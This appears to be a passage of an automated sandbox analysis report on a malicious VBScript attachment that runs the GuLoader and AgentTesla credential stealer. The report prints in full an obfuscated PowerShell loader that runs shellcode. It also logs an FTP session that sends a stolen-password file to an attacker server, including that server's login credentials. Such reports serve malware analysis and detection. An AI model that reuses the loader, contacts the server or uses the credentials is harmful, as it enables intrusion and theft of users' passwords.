                                  Nov 29, 2022 18:34:32.812860012 CET161INData Raw: 2c d7 72 28 93 3c 85 b2 28 75 f2 29 e3 9b ed 91 70 8f 19 a2 8d d5 03 cc b5 ce 50 55 22 9e 2d c7 99 5b 5b bf 84 26 45 27 1d db ab 91 97 26 49 ba 1e 0a 01 af 35 12 9e af 43 c6 7d 25 c5 fb fe 85 aa 19 38 4f 80 60 1b 2d dd 7e 3b 82 36 bd a4 91 08 b8
                                  Data Ascii: ,r(<(u)pPU"-[[&E'&I5C}%8O`-~;6dT[82i9BH'O)f%X(hR)/l(ipyYA{'BV<!{}uXee0\&2G},94?Hkn3LQg5#e }TJZXN
                                  Nov 29, 2022 18:34:32.972552061 CET163INData Raw: 3c bd 68 87 a5 5f 58 96 47 1c 43 79 97 79 05 5b f1 ac cd 33 47 6d 70 aa e0 39 3b 28 11 de ef 59 ba 30 89 32 f0 89 93 f7 c5 50 65 a8 c8 7a a6 af 66 20 4b 71 e5 78 6b 48 5b 58 36 dc ed 9c 92 1b 1e b9 5d a0 78 df 1d 46 b1 d4 f4 9d 6b 14 59 fd fb e2
                                  Data Ascii: <h_XGCyy[3Gmp9;(Y02Pezf KqxkH[X6]xFkYjaTQI%LQ91R =A,%XW#{`WQx2c%y'w5Q#.Wlsx76Ez2'{fU/It)h,


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.11.204985752.20.78.240443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                  TimestampkBytes transferredDirectionData
                                  2022-11-29 17:34:39 UTC0OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
                                  2022-11-29 17:34:39 UTC0INHTTP/1.1 200 OK
                                  Server: Cowboy
                                  Connection: close
                                  Content-Type: text/plain
                                  Vary: Origin
                                  Date: Tue, 29 Nov 2022 17:34:39 GMT
                                  Content-Length: 14
                                  Via: 1.1 vegur
                                  2022-11-29 17:34:39 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 38 34
                                  Data Ascii: 102.129.143.84


                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Nov 29, 2022 18:34:46.696629047 CET2149858185.31.121.136192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                  Nov 29, 2022 18:34:46.696991920 CET4985821192.168.11.20185.31.121.136USER klogz@mcmprint.net
                                  Nov 29, 2022 18:34:46.729505062 CET2149858185.31.121.136192.168.11.20331 User klogz@mcmprint.net OK. Password required
                                  Nov 29, 2022 18:34:46.729799986 CET4985821192.168.11.20185.31.121.136PASS l9Hh{#_(0shZ
                                  Nov 29, 2022 18:34:46.780364990 CET2149858185.31.121.136192.168.11.20230 OK. Current restricted directory is /
                                  Nov 29, 2022 18:34:46.813596010 CET2149858185.31.121.136192.168.11.20504 Unknown command
                                  Nov 29, 2022 18:34:46.813944101 CET4985821192.168.11.20185.31.121.136PWD
                                  Nov 29, 2022 18:34:46.846718073 CET2149858185.31.121.136192.168.11.20257 "/" is your current location
                                  Nov 29, 2022 18:34:46.847259998 CET4985821192.168.11.20185.31.121.136CWD /
                                  Nov 29, 2022 18:34:46.879990101 CET2149858185.31.121.136192.168.11.20250 OK. Current directory is /
                                  Nov 29, 2022 18:34:46.880294085 CET4985821192.168.11.20185.31.121.136TYPE I
                                  Nov 29, 2022 18:34:46.912998915 CET2149858185.31.121.136192.168.11.20200 TYPE is now 8-bit binary
                                  Nov 29, 2022 18:34:46.913393021 CET4985821192.168.11.20185.31.121.136PASV
                                  Nov 29, 2022 18:34:46.946330070 CET2149858185.31.121.136192.168.11.20227 Entering Passive Mode (185,31,121,136,233,124)
                                  Nov 29, 2022 18:34:46.981738091 CET4985821192.168.11.20185.31.121.136STOR PW_user-888683_2022_11_29_18_34_43.html
                                  Nov 29, 2022 18:34:47.016505957 CET2149858185.31.121.136192.168.11.20150 Accepted data connection
                                  Nov 29, 2022 18:34:47.049491882 CET2149858185.31.121.136192.168.11.20226-File successfully transferred
                                  226-File successfully transferred226 0.033 seconds (measured here), 13.16 Kbytes per second
                                  Nov 29, 2022 18:36:26.444715977 CET2149858185.31.121.136192.168.11.20226 Logout.

                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:2
                                  Start time:18:33:27
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
                                  Imagebase:0x7ff7414d0000
                                  File size:170496 bytes
                                  MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Target ID:4
                                  Start time:18:33:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:CMD.EXE /c echo C:\Windows
                                  Imagebase:0x7ff687d50000
                                  File size:289792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Target ID:5
                                  Start time:18:33:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7f8160000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:6
                                  Start time:18:33:33
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;;
                                  Imagebase:0x910000
                                  File size:433152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Target ID:7
                                  Start time:18:33:33
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7f8160000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:10
                                  Start time:18:33:59
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
                                  Imagebase:0x610000
                                  File size:2141552 bytes
                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:moderate

                                  Target ID:11
                                  Start time:18:34:00
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
                                  Imagebase:0x5a0000
                                  File size:46832 bytes
                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Target ID:12
                                  Start time:18:34:20
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                  Imagebase:0xcd0000
                                  File size:106496 bytes
                                  MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:4.1%
                                    Total number of Nodes:74
                                    Total number of Limit Nodes:5
                                    execution_graph 42206 79dcfc0 42207 79dcfd3 42206->42207 42211 79dd038 42207->42211 42216 79dd028 42207->42216 42212 79dd05b 42211->42212 42213 79dd09b 42212->42213 42221 79dd210 42212->42221 42226 79dd220 42212->42226 42217 79dd038 42216->42217 42218 79dd09b 42217->42218 42219 79dd210 CreateNamedPipeW 42217->42219 42220 79dd220 CreateNamedPipeW 42217->42220 42219->42218 42220->42218 42222 79dd215 42221->42222 42231 79dd4a9 42222->42231 42237 79dd4b8 42222->42237 42223 79dd261 42223->42213 42227 79dd234 42226->42227 42229 79dd4a9 CreateNamedPipeW 42227->42229 42230 79dd4b8 CreateNamedPipeW 42227->42230 42228 79dd261 42228->42213 42229->42228 42230->42228 42232 79dd4b8 42231->42232 42234 79dd53a 42232->42234 42243 79ddbf8 42232->42243 42247 79ddbc0 42232->42247 42233 79dd52d 42233->42223 42234->42223 42238 79dd4d1 42237->42238 42240 79dd53a 42238->42240 42241 79ddbf8 CreateNamedPipeW 42238->42241 42242 79ddbc0 CreateNamedPipeW 42238->42242 42239 79dd52d 42239->42223 42240->42223 42241->42239 42242->42239 42244 79ddd28 42243->42244 42245 79ddc1e 42243->42245 42244->42233 42245->42244 42251 79dd7e4 42245->42251 42249 79ddbc5 42247->42249 42248 79dd7e4 CreateNamedPipeW 42250 79ddd28 42248->42250 42249->42248 42249->42250 42250->42233 42252 79dded8 CreateNamedPipeW 42251->42252 42254 79de00a 42252->42254 42294 79d63a0 42300 79d5e4c 42294->42300 42296 79d63d5 42298 79d649c CreateFileW 42299 79d64d9 42298->42299 42301 79d6448 CreateFileW 42300->42301 42303 79d63bf 42301->42303 42303->42296 42303->42298 42255 8e1a90 42256 8e1aa2 42255->42256 42259 8e4cc8 42256->42259 42257 8e1ad2 42260 8e4ce2 42259->42260 42261 8e4d07 42260->42261 42264 8e4d80 42260->42264 42268 8e4d90 42260->42268 42261->42257 42265 8e4d90 42264->42265 42272 8e4df8 42265->42272 42269 8e4da3 42268->42269 42271 8e4df8 GetFileAttributesW 42269->42271 42270 8e4dc1 42270->42261 42271->42270 42273 8e4e1d 42272->42273 42274 8e4dc1 42273->42274 42278 8e5150 42273->42278 42274->42261 42275 8e4ee3 42275->42274 42277 8e5150 GetFileAttributesW 42275->42277 42277->42274 42284 8e5150 GetFileAttributesW 42278->42284 42285 8e51b0 42278->42285 42279 8e517a 42280 8e5180 42279->42280 42290 8e4a2c 42279->42290 42280->42275 42284->42279 42286 8e51c8 42285->42286 42287 8e51dd 42286->42287 42288 8e4a2c GetFileAttributesW 42286->42288 42287->42279 42289 8e520e 42288->42289 42289->42279 42291 8e55f8 GetFileAttributesW 42290->42291 42293 8e520e 42291->42293 42293->42275

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1128 8eeb28-8eeb67 1130 8eeb6d-8eebaf 1128->1130 1131 8ef4f4-8ef58b call 8ef657 1128->1131 1138 8eedee-8eee21 1130->1138 1139 8eebb5-8eec4e 1130->1139 1161 8ef591-8ef59d 1131->1161 1150 8eef2b-8eef41 1138->1150 1151 8eee27-8eee8d 1138->1151 1202 8eedcd-8eedeb 1139->1202 1203 8eec54-8eec6f 1139->1203 1156 8eef4f-8eef7e 1150->1156 1157 8eef43-8eef49 1150->1157 1198 8eef13-8eef28 1151->1198 1199 8eee93-8eeeab 1151->1199 1175 8eefb6-8eeffa 1156->1175 1176 8eef80-8eef9b 1156->1176 1157->1156 1160 8eeffd-8ef03e 1157->1160 1182 8ef080-8ef0a7 1160->1182 1183 8ef040-8ef068 1160->1183 1189 8ef0b3-8ef0b9 1182->1189 1183->1182 1201 8ef06a-8ef075 1183->1201 1191 8ef0cf-8ef0d5 1189->1191 1192 8ef0bb-8ef0c9 1189->1192 1194 8ef0eb-8ef0f7 1191->1194 1195 8ef0d7-8ef0e5 1191->1195 1192->1191 1207 8ef1ab-8ef1b1 1192->1207 1215 8ef0f9-8ef12b 1194->1215 1216 8ef143-8ef14f 1194->1216 1195->1194 1195->1207 1198->1150 1205 8eeebe-8eeec8 1199->1205 1206 8eeead-8eeeb1 1199->1206 1217 8ef07e 1201->1217 1202->1138 1212 8eec85-8eec92 1203->1212 1213 8eec71-8eec75 1203->1213 1221 8eeeca-8eeed0 1205->1221 1222 8eeee0-8eeee6 1205->1222 1206->1205 1208 8eeeb3-8eeeb6 1206->1208 1219 8ef3cf-8ef3d5 1207->1219 1220 8ef1b7-8ef21f 1207->1220 1208->1205 1233 8eecaa-8eecb0 1212->1233 1234 8eec94-8eec9a 1212->1234 1213->1212 1218 8eec77-8eec7d 1213->1218 1215->1216 1256 8ef12d-8ef13d 1215->1256 1216->1207 1240 8ef151-8ef183 1216->1240 1217->1189 1218->1212 1224 8ef3db-8ef435 1219->1224 1225 8ef4d5-8ef4dc 1219->1225 1270 8ef378-8ef399 1220->1270 1271 8ef225-8ef239 1220->1271 1228 8eeed4-8eeed6 1221->1228 1229 8eeed2 1221->1229 1231 8eeee8-8eeeec 1222->1231 1232 8eeef3-8eef11 1222->1232 1272 8ef48b-8ef4a0 1224->1272 1273 8ef437-8ef458 1224->1273 1228->1222 1229->1222 1231->1232 1241 8eeeee-8eeef0 1231->1241 1232->1198 1232->1199 1238 8eecbd-8eecd4 1233->1238 1239 8eecb2-8eecb6 1233->1239 1235 8eec9e-8eeca0 1234->1235 1236 8eec9c 1234->1236 1235->1233 1236->1233 1251 8eecda-8eed1f 1238->1251 1252 8eedb8-8eedc7 1238->1252 1239->1238 1243 8eecb8-8eecba 1239->1243 1240->1207 1263 8ef185-8ef19b 1240->1263 1241->1232 1243->1238 1283 8eed88-8eed9e 1251->1283 1284 8eed21-8eed28 1251->1284 1252->1202 1252->1203 1256->1216 1263->1207 1270->1219 1275 8ef2ff-8ef323 1271->1275 1276 8ef23f-8ef25a 1271->1276 1272->1225 1285 8ef45a-8ef460 1273->1285 1286 8ef470-8ef489 1273->1286 1297 8ef33d-8ef372 1275->1297 1298 8ef325-8ef32b 1275->1298 1276->1275 1287 8ef260-8ef2a6 1276->1287 1283->1252 1288 8eed2a-8eed2e 1284->1288 1289 8eed3b-8eed45 1284->1289 1292 8ef464-8ef466 1285->1292 1293 8ef462 1285->1293 1286->1272 1286->1273 1321 8ef2a8-8ef2b5 1287->1321 1322 8ef2e7-8ef2fc 1287->1322 1288->1289 1295 8eed30-8eed33 1288->1295 1306 8eed5d-8eed63 1289->1306 1307 8eed47-8eed4d 1289->1307 1292->1286 1293->1286 1295->1289 1297->1270 1297->1271 1301 8ef32f-8ef33b 1298->1301 1302 8ef32d 1298->1302 1301->1297 1302->1297 1311 8eed65-8eed69 1306->1311 1312 8eed70-8eed86 1306->1312 1309 8eed4f 1307->1309 1310 8eed51-8eed53 1307->1310 1309->1306 1310->1306 1311->1312 1315 8eed6b-8eed6d 1311->1315 1312->1283 1312->1284 1315->1312 1325 8ef2cd-8ef2e5 1321->1325 1326 8ef2b7-8ef2bd 1321->1326 1322->1275 1325->1321 1325->1322 1327 8ef2bf 1326->1327 1328 8ef2c1-8ef2c3 1326->1328 1327->1325 1328->1325
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86723151942.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_8e0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk
                                    • API String ID: 0-1734348141
                                    • Opcode ID: e83f7110730d65ae66f78267a05c5f195fe49b53f99e95a3bc341159443990c6
                                    • Instruction ID: 5d6904fe00d3c26f5b75f94b59fe9a32649ab873679c4b4b929450fce9881aee
                                    • Opcode Fuzzy Hash: e83f7110730d65ae66f78267a05c5f195fe49b53f99e95a3bc341159443990c6
                                    • Instruction Fuzzy Hash: 73526E30600259DFDB24DF65C850B9AB3B2FF89308F1185A9E909EB7A1DB35ED45CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 079DDFF8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateNamedPipe
                                    • String ID:
                                    • API String ID: 2489174969-0
                                    • Opcode ID: ddcecb447c638b14b24fd12664203ad33bc2aea2b9e4064cc59a53b0c1e5a76e
                                    • Instruction ID: 6bccc5fba5a8b32ce94d8fcbe06a7931902779ff116e29f3210e72f1944c9cf2
                                    • Opcode Fuzzy Hash: ddcecb447c638b14b24fd12664203ad33bc2aea2b9e4064cc59a53b0c1e5a76e
                                    • Instruction Fuzzy Hash: 825126B1D00348EFDB14CFA9C988B8EBBF6AF49304F25C42AE508AB251D7745884CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk
                                    • API String ID: 0-1734348141
                                    • Opcode ID: 08fb77d39ebd471e099c36a2b343c58fa60d5c7a295c88b0b5430b5268f367db
                                    • Instruction ID: 6dd0048209643502cc1784e3d220ef2840ae0b2130f5974faedf27a32e0f903b
                                    • Opcode Fuzzy Hash: 08fb77d39ebd471e099c36a2b343c58fa60d5c7a295c88b0b5430b5268f367db
                                    • Instruction Fuzzy Hash: E6C1AFB13042159FC704EB28C881A9E73A3FFC4304B468A68D509CB756DF74BE4A8BA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5b3f557d920b6d7f32c26bfd412484f62f4f93ffcd2a42da12575f28935a8948
                                    • Instruction ID: 615504e2e0a90bf0472dc3dd32a8c8034dddd78487543318e06c6ebdbb8b812c
                                    • Opcode Fuzzy Hash: 5b3f557d920b6d7f32c26bfd412484f62f4f93ffcd2a42da12575f28935a8948
                                    • Instruction Fuzzy Hash: 5CB29BB4A14205DFCB15DFA4C985BAEBBB6FB89308F248169E8059B352DB35EC41CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4126f146ebe7c1f18d3efa9c1dd6c70e9aa211ad2aa24e132b25afecd5318948
                                    • Instruction ID: 6c02cd555a049431725b4065f1b432c656770043fa351509c7d64b84b8290400
